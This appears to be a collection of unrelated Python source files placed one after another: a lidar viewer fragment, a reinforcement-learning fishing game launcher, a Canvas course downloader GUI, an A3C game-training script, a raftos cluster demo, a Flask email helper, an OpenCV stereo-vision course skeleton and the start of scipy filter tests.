#cv2.imshow('disparity', cv2.pyrDown(disp)/64.0)
framenum = self.reader_left.framenum
if framenum >= len(self.ldr_map):
self.finished = True
return
ldr_file = self.ldr_map[framenum]
lidar_pts = loadLDR(ldr_file)
self.queue.put({'img': imgL, 'lidar_pts': lidar_pts,
'stereo_pts': stereo_wrt_lidar})
"""
while self.queue.qsize() > 5:
time.sleep(0.1)
"""
def Keypress(obj, event):
key = obj.GetKeySym()
print key
if __name__ == '__main__':
args = parse_args(sys.argv[1], sys.argv[2])
cam_num = int(sys.argv[2][-5])
params = args['params']
assert(cam_num == 1)
frame_cloud_manager = FrameCloudManager(args)
global count
count = 1
global lastTime
lastTime = 0
cloud_r = vtk.vtkRenderer()
cloud_r.SetBackground(0., 0., 0.)
cloud_r.SetViewport(0,0,0.5,1.0)
image_r = vtk.vtkRenderer()
image_r.SetBackground(0., 0., 0.)
image_r.SetViewport(0.5,0,1.0,1.0)
image_r.SetInteractive(False)
axes = vtk.vtkAxesActor()
axes.AxisLabelsOff()
cloud_r.AddActor(axes)
# Render Window
renderWindow = vtk.vtkRenderWindow()
renderWindow.AddRenderer(cloud_r)
renderWindow.AddRenderer(image_r)
renderWindow.SetSize(1200, 600)
# Interactor
renderWindowInteractor = vtk.vtkRenderWindowInteractor()
renderWindowInteractor.SetRenderWindow(renderWindow)
mouseInteractor = vtk.vtkInteractorStyleTrackballCamera()
renderWindowInteractor.SetInteractorStyle(mouseInteractor)
renderWindow.Render()
cb = LDRGrabberCallback(frame_cloud_manager)
renderWindowInteractor.AddObserver('TimerEvent', cb.execute)
renderWindowInteractor.AddObserver('KeyPressEvent', Keypress)
timerId = renderWindowInteractor.CreateRepeatingTimer(1)
renderWindowInteractor.Start()
|
main.py | import argparse
import multiprocessing as mp
import sys
import yaml
from kivy import Config
from shared import SettingLoader
class Settings:
def __init__(self):
# Player mode, either 'human' or 'ai_rl'
self.player_type = None
# Frame rate of the game in seconds per frame
self.frames_per_second = None
# Window size is immutable and equal to self.window_scale * (800, 600)
self.window_scale = None
# Duration of the game in seconds
self.game_time = None
# Initial position of diver
self.init_pos_diver = None
# Jellyfishes x position
self.jelly_x = None
# Jellyfishes y position
self.jelly_y = None
# Rewards for bumping [golden_fish, jellyfish, step]
self.rewards = None
# Position of the king fish
self.pos_king = None
# Stochasticity
self.randomness = None
# Episode length
self.episode_len = None
# Max Episodes
self.episode_max = None
# Visualize exploration
self.visualize_exploration = None
# Headless
self.headless = None
# Seed
self.seed = None
# Learning rate
self.alpha = 0
# Discount rate
self.discount = 0
# epsilon initial
self.epsilon_initial = 1
# epsilon final
self.epsilon_final = 1
# annealing timesteps
self.annealing_timesteps = 10000
# threshold
self.threshold = 1e-6
def load_from_dict(self, dictionary):
"""
Load parameters into settings object from dictionary.
:param dictionary:
:return:
"""
self.player_type = dictionary.get("player_type")
self.frames_per_second = dictionary.get("frames_per_second", 20)
self.init_pos_diver = dictionary.get('init_pos_diver', [1, 19])
self.jelly_x = dictionary.get("jelly_x", [2, 2, 2, 2, 2])
self.jelly_y = dictionary.get("jelly_y", [2, 2, 2, 2, 2])
self.rewards = dictionary.get("rewards", [1, -1, -1, -1, -1])
self.pos_king = dictionary.get("pos_king", [0.5, 0.5])
self.window_scale = dictionary.get("window_scale", 1.0)
self.game_time = dictionary.get("time", 120)
self.randomness = dictionary.get("stoch", True)
self.episode_len = dictionary.get("episode_len", 100)
self.episode_max = dictionary.get("episode_max", 1000)
self.visualize_exploration = dictionary.get("visualize_exploration",
False)
self.headless = dictionary.get("headless")
self.seed = dictionary.get("seed", None)
self.alpha = dictionary.get("alpha", 0)
self.gamma = dictionary.get("gamma", 0)
self.threshold = dictionary.get("threshold", 1e-6)
self.threshold = float(self.threshold)
self.epsilon_final = dictionary.get("epsilon_final", 1)
self.epsilon_initial = dictionary.get("epsilon_initial", 0.2)
self.annealing_timesteps = dictionary.get("annealing_timesteps", 10000)
class Application(SettingLoader):
def __init__(self):
SettingLoader.__init__(self)
# Declaration of class objects
self.game_controller = None
self.player_controller = None
self.settings = None
self.game_pipe_send = None
self.game_pipe_receive = None
self.player_pipe_receive = None
self.player_pipe_send = None
self.player_loop = None
def start(self):
"""
Start game and player processes
:return:
"""
# Initialize game process
self.game_controller = self.get_app(self.settings.headless)
self.game_controller.load_settings(self.settings)
self.game_controller.set_receive_send_pipes(self.game_pipe_receive,
self.game_pipe_send)
if self.settings.seed is not None:
self.game_controller.set_seed(self.settings.seed) #507 episodes
# Initialize player process
self.player_controller = self.get_player_controller()
self.player_controller.load_settings(self.settings)
self.player_controller.set_receive_send_pipes(self.player_pipe_receive,
self.player_pipe_send)
# Set player loop to use
self.select_and_launch_player_loop()
self.start_game()
def select_and_launch_player_loop(self):
# Create process
self.player_loop = mp.Process(
target=self.player_controller.player_loop)
# Start process
self.player_loop.start()
@staticmethod
def get_app(headless=True):
# from app import FishingDerbyRLApp
from app_manager import FishingDerbyRLApp
a = FishingDerbyRLApp(headless=headless)
return a
def get_player_controller(self):
if self.settings.player_type == "human":
from player import PlayerControllerHuman
pc = PlayerControllerHuman()
elif self.settings.player_type == "ai_rl":
# from player import PlayerControllerRL
from player import PlayerControllerRL
pc = PlayerControllerRL()
elif self.settings.player_type == "random":
from player import PlayerControllerRandom
pc = PlayerControllerRandom()
else:
raise NotImplementedError
return pc
def start_game(self):
"""
Starting the game and the parallel processes: player and game.
:return:
"""
self.game_controller.set_player_loop_pid(self.player_loop.pid)
# Start graphical interface
self.game_controller.run_headless()
# self.game_controller.run()
# After closing window wait until the player loop finishes
self.player_loop.join()
sys.exit(0)
def create_pipes(self):
"""
Create pipes to allow exchange of data between player and game processes
:return:
"""
self.game_pipe_send, self.player_pipe_receive = mp.Pipe()
self.player_pipe_send, self.game_pipe_receive = mp.Pipe()
if __name__ == '__main__':
# Arguments parsing
arg_parser = argparse.ArgumentParser(
description="Run the fishing derby KTH app")
arg_parser.add_argument("config_file", type=str, help="Configuration file")
args = arg_parser.parse_args()
# Load the settings from the yaml file
settings = Settings()
settings_dictionary = yaml.safe_load(open(args.config_file, 'r'))
settings.load_from_dict(settings_dictionary)
# Set window dimensions
if not settings.headless:
Config.set('graphics', 'resizable', False)
Config.set('graphics', 'width', str(int(settings.window_scale * 800)))
Config.set('graphics', 'height', str(int(settings.window_scale * 600)))
# Start application
app = Application()
app.load_settings(settings)
app.create_pipes()
app.start()
|
main.py | from PySide6.QtGui import QGuiApplication
from PySide6.QtCore import QStringListModel, Qt, QUrl
from PySide6.QtQuick import QQuickView
from PySide6.QtQml import QQmlApplicationEngine
import sys
import os
import canvas_grab
import threading
from .sync_model import SyncModel
from colorama import init
from termcolor import colored
from time import sleep
from canvasapi.exceptions import ResourceDoesNotExist
class Main:
def __init__(self):
self._model = SyncModel()
def _canvas_grab_run(self):
config = self._config
canvas = config.endpoint.login()
user = canvas.get_current_user()
self._model.on_update_login_user.emit(str(user))
courses = list(canvas.get_courses())
available_courses, not_available = canvas_grab.utils.filter_available_courses(
courses)
filtered_courses = config.course_filter.get_filter().filter_course(
available_courses)
total_course_count = len(courses)
not_available_count = len(not_available)
filtered_count = len(available_courses) - len(filtered_courses)
self._model.on_done_fetching_courses.emit(
f'您已经以 {user} 身份登录。共有 {total_course_count} 门课程需同步,其中 {not_available_count} 门无法访问,{filtered_count} 门已被过滤。')
course_name_parser = canvas_grab.course_parser.CourseParser()
for idx, course in enumerate(filtered_courses):
course_name = course.name
self._model.on_new_course_in_progress.emit(
f'({idx+1}/{len(filtered_courses)}) {course_name} (ID: {course.id})')
# take on-disk snapshot
parsed_name = course_name_parser.get_parsed_name(course)
print(f' Download to {colored(parsed_name, "cyan")}')
on_disk_path = f'{config.download_folder}/{parsed_name}'
on_disk_snapshot = canvas_grab.snapshot.OnDiskSnapshot(
on_disk_path).take_snapshot()
# take canvas snapshot
mode, canvas_snapshots = config.organize_mode.get_snapshots(course)
canvas_snapshot = {}
for canvas_snapshot_obj in canvas_snapshots:
try:
for progress_item in canvas_snapshot_obj.yield_take_snapshot():
(progress, status_text, progress_text) = progress_item
self._model.on_snapshot_in_progress.emit(
progress, status_text, progress_text)
canvas_snapshot = canvas_snapshot_obj.get_snapshot()
except ResourceDoesNotExist:
print(
colored(f'{mode} not supported, falling back to alternative mode', 'yellow'))
continue
break
# generate transfer plan
planner = canvas_grab.planner.Planner(
config.organize_mode.delete_file)
plans = planner.plan(
canvas_snapshot, on_disk_snapshot, config.file_filter)
print(colored(
f' Updating {len(plans)} objects '))
# start download
transfer = canvas_grab.transfer.Transfer()
transfer_task = transfer.yield_transfer(
on_disk_path, f'{config.download_folder}/_canvas_grab_archive', plans)
for progress_item in transfer_task:
(progress, status_text, progress_text) = progress_item
self._model.on_download_in_progress.emit(
progress, status_text, progress_text)
self._model.on_finish_course.emit(
f'{course_name} (ID: {course.id})',
f'更新了 {len(plans)} 个文件。(远程 {len(canvas_snapshot)} -> 本地 {len(on_disk_snapshot)})')
if not self._noupdate:
canvas_grab.version.check_latest_version()
def _exit_handler(self):
os._exit(0)
def main(self):
init()
# Welcome users, and load configurations.
try:
_, self._noupdate, self._config = canvas_grab.get_options.get_options()
except TypeError:
# User canceled the configuration process
return
app = QGuiApplication(sys.argv)
app.setQuitOnLastWindowClosed(True)
app.aboutToQuit.connect(self._exit_handler)
engine = QQmlApplicationEngine()
engine.rootContext().setContextProperty('py_sync_model', self._model)
engine.load(os.path.join(os.path.dirname(__file__), "ui/main.qml"))
if not engine.rootObjects():
sys.exit(-1)
thread = threading.Thread(target=self._canvas_grab_run)
thread.start()
sys.exit(app.exec_())
if __name__ == "__main__":
Main().main()
|
train.py | import os
import queue
import threading
import time
from collections import defaultdict
import numpy as np
import parl
import retro
from parl.utils import logger, summary, machine_info, get_gpu_count
from parl.utils.time_stat import TimeStat
from parl.utils.window_stat import WindowStat
import retro_util
from actor import Actor
from agent import Agent
from config import config
from model import Model
class Learner(object):
def __init__(self, config):
self.config = config
# 这里创建游戏单纯是为了获取游戏动作的维度
env = retro_util.RetroEnv(game=config['env_name'],
use_restricted_actions=retro.Actions.DISCRETE,
resize_shape=config['obs_shape'],
render_preprocess=False)
obs_dim = env.observation_space.shape
action_dim = env.action_space.n
self.config['action_dim'] = action_dim
# 这里创建的模型是真正学习使用的
model = Model(action_dim)
algorithm = parl.algorithms.A3C(model, vf_loss_coeff=config['vf_loss_coeff'])
self.agent = Agent(algorithm, config, obs_dim)
# 只支持单个GPU
if machine_info.is_gpu_available():
assert get_gpu_count() == 1, 'Only support training in single GPU,\
Please set environment variable: `export CUDA_VISIBLE_DEVICES=[GPU_ID_TO_USE]` .'
# 加载预训练模型
if self.config['restore_model']:
logger.info("加载预训练模型...")
self.agent.restore(self.config['model_path'])
# 记录训练的日志
self.total_loss_stat = WindowStat(100)
self.pi_loss_stat = WindowStat(100)
self.vf_loss_stat = WindowStat(100)
self.entropy_stat = WindowStat(100)
self.lr = None
self.entropy_coeff = None
self.best_loss = None
self.learn_time_stat = TimeStat(100)
self.start_time = None
# ========== Remote Actor ===========
self.remote_count = 0
self.sample_data_queue = queue.Queue()
self.remote_metrics_queue = queue.Queue()
self.sample_total_steps = 0
self.params_queues = []
self.create_actors()
# 开始创建指定数量的Actor,并发放的集群中
def create_actors(self):
# 连接到集群
parl.connect(self.config['master_address'])
logger.info('Waiting for {} remote actors to connect.'.format(self.config['actor_num']))
# 循环生成多个Actor线程
for i in range(self.config['actor_num']):
# 更新参数的队列
params_queue = queue.Queue()
self.params_queues.append(params_queue)
self.remote_count += 1
logger.info('Remote actor count: {}'.format(self.remote_count))
# 创建Actor的线程
remote_thread = threading.Thread(target=self.run_remote_sample, args=(params_queue,))
remote_thread.setDaemon(True)
remote_thread.start()
logger.info('All remote actors are ready, begin to learn.')
self.start_time = time.time()
# 创建Actor,并使用无限循环更新Actor的模型参数和获取游戏数据
def run_remote_sample(self, params_queue):
# 创建Actor
remote_actor = Actor(self.config)
while True:
# 获取train的模型参数
latest_params = params_queue.get()
# 设置Actor中的模型参数
remote_actor.set_weights(latest_params)
# 获取一小批的游戏数据
batch = remote_actor.sample()
# 将游戏数据添加的数据队列中
self.sample_data_queue.put(batch)
# 开始模型训练
def step(self):
"""
1. 启动所有Actor,同步参数和样本数据;
2. 收集所有Actor生成的数据;
3. 更新参数.
"""
# 获取train中模型最新的参数
latest_params = self.agent.get_weights()
# 将参数同步给没有Actor线程的参数队列
for params_queue in self.params_queues:
params_queue.put(latest_params)
train_batch = defaultdict(list)
# 获取每个Actor生成的数据
for i in range(self.config['actor_num']):
sample_data = self.sample_data_queue.get()
for key, value in sample_data.items():
train_batch[key].append(value)
# 记录训练步数
self.sample_total_steps += sample_data['obs'].shape[0]
# 将各个Actor的数据打包的训练数据
for key, value in train_batch.items():
train_batch[key] = np.concatenate(value)
# 执行一次训练
with self.learn_time_stat:
total_loss, pi_loss, vf_loss, entropy, lr, entropy_coeff = self.agent.learn(
obs_np=train_batch['obs'],
actions_np=train_batch['actions'],
advantages_np=train_batch['advantages'],
target_values_np=train_batch['target_values'])
# 记录训练数据
self.total_loss_stat.add(total_loss)
self.pi_loss_stat.add(pi_loss)
self.vf_loss_stat.add(vf_loss)
self.entropy_stat.add(entropy)
self.lr = lr
self.entropy_coeff = entropy_coeff
# 保存训练日志
def log_metrics(self):
# 避免训练还未开始的情况
if self.start_time is None:
return
# 获取最好的模型
if self.best_loss is None:
self.best_loss = self.total_loss_stat.mean
else:
if self.best_loss > self.total_loss_stat.mean:
self.best_loss = self.total_loss_stat.mean
self.save_model("model_best")
# 训练数据写入到日志中
summary.add_scalar('total_loss', self.total_loss_stat.mean, self.sample_total_steps)
summary.add_scalar('pi_loss', self.pi_loss_stat.mean, self.sample_total_steps)
summary.add_scalar('vf_loss', self.vf_loss_stat.mean, self.sample_total_steps)
summary.add_scalar('entropy', self.entropy_stat.mean, self.sample_total_steps)
summary.add_scalar('lr', self.lr, self.sample_total_steps)
summary.add_scalar('entropy_coeff', self.entropy_coeff, self.sample_total_steps)
logger.info('total_loss: {}'.format(self.total_loss_stat.mean))
# 保存模型
def save_model(self, model_name="model"):
# 避免训练还未开始的情况
if self.start_time is None:
return
save_path = os.path.join(self.config['model_path'], model_name)
if not os.path.exists(save_path):
os.makedirs(save_path)
self.agent.save(save_path)
# 检测训练步数是否达到最大步数
def should_stop(self):
return self.sample_total_steps >= self.config['max_sample_steps']
if __name__ == '__main__':
learner = Learner(config)
assert config['log_metrics_interval_s'] > 0
assert config['save_model_interval_s'] > 0
start1 = time.time()
while not learner.should_stop():
start = time.time()
while time.time() - start < config['log_metrics_interval_s']:
learner.step()
# 保存日柱子
learner.log_metrics()
# 保存模型
if time.time() - start1 > config['save_model_interval_s']:
start1 = time.time()
learner.save_model()
print("================ 训练结束!================")
# 最后结束之前保存模型
learner.save_model("final_model")
|
run_cluster.py | #!/usr/bin/bin python3
import os
import logging
import asyncio
import random
import raftos
import raftos.serializers
from argparse import ArgumentParser
from datetime import datetime
from multiprocessing import Process
from js9 import j
logging.basicConfig(level=logging.INFO)
log = logging.getLogger()
CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))
class Class:
data = raftos.Replicated(name='data')
def main(log_dir, node, cluster):
loop = asyncio.new_event_loop()
raftos.configure({
'log_path': log_dir,
'serializer': raftos.serializers.JSONSerializer,
'loop': loop
})
loop.run_until_complete(run(loop, node, cluster))
async def run(loop, node, cluster):
await raftos.register(node, cluster=cluster, loop=loop)
obj = Class()
while True:
await asyncio.sleep(1, loop=loop)
if raftos.get_leader() == node:
print("###########")
print(node)
obj.data = {
'id': random.randint(1, 1000),
'data': {
'amount': random.randint(1, 1000) * 1000,
'created_at': datetime.now().strftime('%d/%m/%y %H:%M')
}
}
print(obj.data)
else:
print("------------")
print(node)
print(obj.data)
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('-p', '--start-port', help='Start port', type=int, default=8000)
parser.add_argument('-n', '--processes', help='Cluster size', type=int, default=3)
parser.add_argument('-d', '--log-dir', default=os.path.abspath('logs'),
dest='log_dir', help="Log dir")
args = parser.parse_args()
os.makedirs(args.log_dir, exist_ok=True)
neighbours = set(
"127.0.0.1:{}".format(args.start_port + i) for i in range(args.processes)
)
processes = set([])
try:
for neighbour in neighbours:
node_args = (args.log_dir, neighbour, neighbours - {neighbour})
p = Process(target=main, args=node_args)
log.info("%r", node_args)
p.start()
processes.add(p)
while processes:
for process in tuple(processes):
process.join()
processes.remove(process)
finally:
for process in processes:
if process.is_alive():
log.warning('Terminating %r', process)
process.terminate()
|
email.py | from threading import Thread
from flask import current_app
from flask_mail import Message
from app import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
# ----------------------------------------- Helper FN that sends an email -------------------------------------------
# NOTE: Flask-Mail supports some features that I'm not utilizing here such as Cc and Bcc lists. (SEE FLASK-MAIL DOCS)
# ARGS:
# - subject : Subject Line of The Email
# - sender : Sender Email Address
# - recipients : Recipient Email Address(es)
# - text_body : Non-HTML Version of the Email
# - html_body : HTML Version of the Email (This version should render whenever possible as it's prettier)
# Message FN:
# - configures the email parameters and has fields respective to the passed arguments
# -------------------------------------------------------------------------------------------------------------------
def send_email(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
# The current_app._get_current_object() expression extracts the actual application instance from inside the proxy
# object, so that is what I passed to the thread as an argument.
Thread(target=send_async_email, args=(current_app._get_current_object(), msg)).start()
# -------------------------------------------------------------------------------------------------------------------
|
OpenCV3D.py | #<!--------------------------------------------------------------------------->
#<!-- ITU - IT University of Copenhagen -->
#<!-- SSS - Software and Systems Section -->
#<!-- File : OpenCV3D.py -->
#<!-- Description: Main class of this project -->
#<!-- Author : Fabricio Batista Narcizo -->
#<!-- : Rued Langgaards Vej 7 - 4D06 - DK-2300 - Copenhagen S -->
#<!-- : fabn[at]itu[dot]dk -->
#<!-- Responsable: Dan Witzner Hansen (witzner[at]itu[dot]dk) -->
#<!-- Fabricio Batista Narcizo (fabn[at]itu[dot]dk) -->
#<!-- Information: No additional information -->
#<!-- Date : 05/04/2015 -->
#<!-- Change : 05/04/2015 - Creation of these classes -->
#<!-- : 06/04/2015 - Comentaries -->
#<!-- Review : 06/04/2015 - Finalized -->
#<!--------------------------------------------------------------------------->
__version__ = '$Revision: 2015040601 $'
########################################################################
import cv2
import sys
import numpy as np
from collections import deque
from threading import Thread
from Cameras.CameraEnum import CameraEnum
from Cameras.StereoCameras import StereoCameras
from Processing.Configuration import Configuration
########################################################################
class OpenCV3D(object):
"""OpenCV3D class is the main class of this project."""
#----------------------------------------------------------------------#
# Class Attributes #
#----------------------------------------------------------------------#
___plyHeader = '''ply
format ascii 1.0
element vertex %(num)d
property float x
property float y
property float z
end_header
'''
#----------------------------------------------------------------------#
# Class Properties #
#----------------------------------------------------------------------#
@property
def Image(self):
"""Get the last processed image."""
return self.__image
@Image.setter
def Image(self, value):
"""Set the last processed image."""
self.__image = value
@property
def PointsQueue(self):
"""Get the queue with selected points."""
return self.__pointsQueue
@PointsQueue.setter
def PointsQueue(self, value):
"""Set the queue with selected points."""
self.__pointsQueue = value
@property
def IsCalibrating(self):
"""Check if the calibration process is running."""
return self.__isCalibrating
@IsCalibrating.setter
def IsCalibrating(self, value):
"""Set that the calibration process starts."""
self.__isCalibrating = value
@property
def IsSaving(self):
"""Check if the PLY save file process is running."""
return self.__isSaving
@IsSaving.setter
def IsSaving(self, value):
"""Set that the PLY save process starts."""
self.__isSaving = value
@property
def IsFrozen(self):
"""Check if the fundamental matrix process is running."""
return self.__isFrozen
@IsFrozen.setter
def IsFrozen(self, value):
"""Set that the fundamental matrix process is running."""
self.__isFrozen = value
#----------------------------------------------------------------------#
# OpenCV3D Class Constructor #
#----------------------------------------------------------------------#
def __init__(self):
"""OpenCV3D Class Constructor."""
self.Clear()
def __del__(self):
"""OpenCV3D Class Destructor."""
# Stops the main thread system.
self.Stop()
#----------------------------------------------------------------------#
# Public Class Methods #
#----------------------------------------------------------------------#
def Start(self):
"""Start a new thread for managering the system."""
self.__isRunning = True
#self.__thread = Thread(target=self.__CaptureThread)
#self.__thread.start()
return True
def Stop(self):
"""Stop the main thread."""
if self.__isRunning is not True:
return False
self.__isRunning = False
#self.__thread.join(1000)
return True
def Clear(self):
"""Empty all internal parameters used for this class."""
self.hasFundamentalMatrix = self.IsCalibrating = self.IsSaving = self.IsFrozen = False
self.PointsQueue = deque(maxlen=16)
#----------------------------------------------------------------------#
# Private Class Methods #
#----------------------------------------------------------------------#
def CaptureThread(self):
"""Main thread of this system."""
# Creates a window to show the original images.
cv2.namedWindow("Original", cv2.WINDOW_AUTOSIZE)
cv2.setMouseCallback("Original", self.mouseEvent)
#cameraOneCap=cv2.VideoCapture(0)
#cameraTwoCap=cv2.VideoCapture(2)
# Creates a window to show the stereo images.
cv2.namedWindow("Stereo", cv2.WINDOW_AUTOSIZE)
# Creates a window to show the depth map.
cv2.namedWindow("DepthMap", cv2.WINDOW_AUTOSIZE)
cv2.createTrackbar("minDisparity", "DepthMap", 1, 32, self.__SetMinDisparity)
cv2.createTrackbar("blockSize", "DepthMap", 1, 5, self.__SetNothing)
# Repetition statement for analyzing each captured image.
while True:
# Check if the fundamental matrix process is running.
if not self.IsFrozen:
# Grabs the next frame from capturing device.
StereoCameras.Instance.Grab()
# Decodes and returns the grabbed video frames.
leftImage, rightImage = StereoCameras.Instance.Retrieve()
# Find the pattern in the image.
leftCorners = Configuration.Instance.Pattern.FindCorners(leftImage)
rightCorners = Configuration.Instance.Pattern.FindCorners(rightImage)
# Check if the calibration process is running.
if self.IsCalibrating:
# If both pattern have been recognized, start the calibration process.
if leftCorners is not None and rightCorners is not None:
self.__Calibrate(leftCorners, rightCorners)
# Otherwise, stop the calibrations process.
else:
self.IsCalibrating = False
# Check if the system is calibrated.
elif Configuration.Instance.Calibration.IsCalibrated:
# Estimate the depth map from two stereo images.
self.__DepthMap(leftImage, rightImage)
# Combine two stereo images in only one window.
self.Image = self.__CombineImages(leftImage, rightImage, 1)
cv2.imshow("Original", self.Image)
# Check what the user wants to do.
inputKey = cv2.waitKey(1)
# Esc or letter "q" key.
if inputKey == 27 or inputKey == ord("q"):
break
# Space key.
elif inputKey == 32:
self.IsCalibrating = True
# Letter "s" key.
elif inputKey == ord("s"):
self.IsSaving = True
# Letter "f" key.
elif inputKey == ord("f"):
self.IsFrozen = not self.IsFrozen
# Closes all video capturing devices.
StereoCameras.Instance.Release()
# Close all OpenCV windows.
cv2.destroyAllWindows()
def __FundamentalMatrix(self, point):
# Check if the image is frozen.
# SIGB: The user can frozen the input image presses "f" key.
if self.IsFrozen:
# Insert the new selected point in the queue.
if self.__UpdateQueue(point):
# Get all points selected by the user.
points = np.asarray(self.PointsQueue, dtype=np.float32)
# <000> Get the selected points from the left and right images.
pointsLeft,pointsRight=[],[]
for i in xrange(0,16):
if i % 2 ==0:
pointLeft=points[i]
pointsLeft.append(pointLeft)
elif i % 2 ==1:
pointRight=points[i]
pointsRight.append(pointRight)
pointsLeft=np.array(pointsLeft, dtype=np.float32)
pointsRight=np.array(pointsRight, dtype=np.float32)
# <001> Estimate the Fundamental Matrix.
FundMat,mask1=cv2.findFundamentalMat(pointsLeft,pointsRight)
# <002> Save the Fudamental Matrix in the F attribute of the CamerasParameters class.
StereoCameras.Instance.Parameters.F=FundMat
# Get each point from left image.
for pt in pointsLeft:
# <003> Estimate the epipolar line.
lineEpi=cv2.computeCorrespondEpilines(np.array([pt]), 1, StereoCameras.Instance.Parameters.F)
# <004> Define the initial and final points of the line.
initialP=(1280+(int(-lineEpi[0,0,2]/lineEpi[0,0,0])),0)
FinalP=(1280,int(-lineEpi[0,0,2]/lineEpi[0,0,1]))
# <005> Draws the epipolar line in the input image.
cv2.line(self.Image, initialP, FinalP, (255,0,0))
# Get each point from right image.
for pt in pointsRight:
# <006> Estimate the epipolar line.
lineEpi=cv2.computeCorrespondEpilines(np.array([pt]), 2, StereoCameras.Instance.Parameters.F)
initialP=(int(-lineEpi[0,0,2]/lineEpi[0,0,0]),0)
FinalP=(0,int(-lineEpi[0,0,2]/lineEpi[0,0,1]))
cv2.line(self.Image, initialP, FinalP, (0,0,255))
# Show the final result of this process to the user.
cv2.imshow("Original", self.Image)
# Update the fundamental matrix flag and release the system
self.hasFundamentalMatrix = True
def __Calibrate(self, leftCorners, rightCorners):
"""Calibrate the stereo camera for each new detected pattern."""
# Get The outer vector contains as many elements as the number of the pattern views.
objectPoints = Configuration.Instance.Pattern.CalculePattern()
# <007> Insert the pattern detection results in three vectors.
# Get the parameters used for calibrating each stereo camera.
leftCorners = Configuration.Instance.Pattern.LeftCorners
rightCorners = Configuration.Instance.Pattern.RightCorners
objectPoints = Configuration.Instance.Pattern.ObjectPoints
# <008> Finds the camera intrinsic and extrinsic parameters from several views of a calibration pattern.
# <008> Write the camera intrinsic and extrinsic parameters.
# Calibrates the stereo camera.
R, T = Configuration.Instance.Calibration.StereoCalibrate(leftCorners, rightCorners, objectPoints)
# <015> Computes rectification transforms for each head of a calibrated stereo camera.
# <016> Computes the undistortion and rectification transformation maps.
# End the calibration process.
self.IsCalibrating = False
# Stop the system for 1 second, because the user will see the processed images.
cv2.waitKey(1000)
def __Epipolar(self, point):
"""Define the points used during the fundamental matrix process."""
pass
def __DepthMap(self, leftImage, rightImage):
"""Estimate the depth map from two stereo images."""
# <017> Create the stereo image.
# <018> Get the attributes for the block matching algorithm.
# SIGB: minDisparity needs to be divisible by 16 and block size needs to be an odd number.
# <019> Computing a stereo correspondence using the block matching algorithm.
# Check if it is necessary to save the PLY file.
if self.IsSaving:
self.__SavePLY(disparity, leftStereo)
# <020> Normalizes the disparity image for a valid output OpenCV image.
# Shows the disparity image.
cv2.imshow("DepthMap", disparity)
# Combine two stereo images in only one window.
stereo = self.__CombineImages(leftStereo, rightStereo, 1)
cv2.imshow("Stereo", stereo)
def __SavePLY(self, disparity, image):
# Check if the system is calibrated.
if Configuration.Instance.Calibration.IsCalibrated:
# Get a 4x4 disparity-to-depth mapping matrix.
Q = StereoCameras.Instance.Parameters.Q
# Reprojects a disparity image to 3D space.
points = cv2.reprojectImageTo3D(disparity, Q)
# Creates a mask of the depth mapping matrix.
mask = disparity > disparity.min()
points = points[mask].reshape(-1, 3)
# Defines the output numpy array.
output = points
# Save the output file.
with open("OpenCV3D.ply", "w") as filename:
filename.write(OpenCV3D.___plyHeader % dict(num = len(output)))
np.savetxt(filename, output, "%f %f %f", newline="\n")
# End the PLY save process.
self.IsSaving = False
def __CombineImages(self, image1, image2, scale=1):
"""Combine two image in only one visualization."""
# Define the final size.
height, width = image1.shape[:2]
width = int(width * scale)
height = int(height * scale)
# Define the new size to input images.
image1 = cv2.resize(image1, (width, height))
image2 = cv2.resize(image2, (width, height))
# Create the final image.
image = np.zeros((height, width * 2, 3), dtype=np.uint8)
image[:height, :width ] = image1
image[:height, width:width * 2] = image2
# Return the combine images.
return image
#----------------------------------------------------------------------#
# Class Action Events Methods #
#----------------------------------------------------------------------#
def mouseEvent(self, event, x, y, flag, param):
"""This is an example of a calibration process using the mouse clicks."""
# Starts the PLY save process.
if event == cv2.EVENT_LBUTTONDOWN:
if self.hasFundamentalMatrix:
self.__Epipolar((x, y))
else:
self.__FundamentalMatrix((x, y))
# Reset all configuration variables.
elif event == cv2.EVENT_MBUTTONDOWN:
self.Clear()
Configuration.Instance.Clear()
# Starts the calibration process.
elif event == cv2.EVENT_RBUTTONUP:
self.IsCalibrating = True
def __UpdateQueue(self, point):
"""Insert a new point in the queue."""
# Get the current queue size.
size = len(self.PointsQueue)
# Check if the queue is full.
if size == self.PointsQueue.maxlen:
return True
# Defines the color used for draw the circle and the line.
color = (0, 0, 255) if size % 2 == 0 else (255, 0, 0)
# Draw a circle in the selected point.
cv2.circle(self.Image, point, 3, color, thickness=-1)
cv2.imshow("Original", self.Image)
# Adjust the right click to correct position.
if size % 2 != 0:
point = (point[0] - 1280, point[1])
# It is necessary to update the selected point, because the systems shows a resized input image.
# SIBG: You can use the original size, if you call __CombineImages() method with scale factor value 1.0.
point = (point[0], point[1], 1)
# Insert the new point in the queue.
self.PointsQueue.append(point)
# Check if the queue is full now.
if size + 1 == self.PointsQueue.maxlen:
return True
# It is necessary to add more points.
return False
def __SetMinDisparity(self, value):
"""Masks the minDisparity variable."""
if value == 0:
cv2.setTrackbarPos("minDisparity", "DepthMap", int(1))
def __SetNothing(self, value):
"""Standard mask."""
pass
#----------------------------------------------------------------------#
# Main Methods #
#----------------------------------------------------------------------#
def main(argv):
a=OpenCV3D()
a.Start()
a.CaptureThread()
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
test_filters.py | ''' Some tests for filters '''
from __future__ import division, print_function, absolute_import
import sys
import numpy as np
from numpy.testing import (assert_equal, assert_allclose,
assert_array_equal, assert_almost_equal)
from pytest import raises as assert_raises
import scipy.ndimage as sndi
from scipy.ndimage.filters import _gaussian_kernel1d, rank_filter
from scipy._lib._numpy_compat import suppress_warnings
def test_ticket_701():
# Test generic filter sizes
arr = np.arange(4).reshape((2,2))
func = lambda x: np.min(x)
res = sndi.generic_filter(arr, func, size=(1,1))
# The following raises an error unless ticket 701 is fixed
res2 = sndi.generic_filter(arr, func, size=1)
assert_equal(res, res2)
def test_gh_5430():
# At least one of these raises an error unless gh-5430 is
# fixed. In py2k an int is implemented using a C long, so
# which one fails depends on your system. In py3k there is only
# one arbitrary precision integer type, so both should fail.
sigma = np.int32(1)
out = sndi._ni_support._normalize_sequence(sigma, 1)
assert_equal(out, [sigma])
sigma = np.int64(1)
out = sndi._ni_support._normalize_sequence(sigma, 1)
assert_equal(out, [sigma])
# This worked before; make sure it still works
sigma = 1
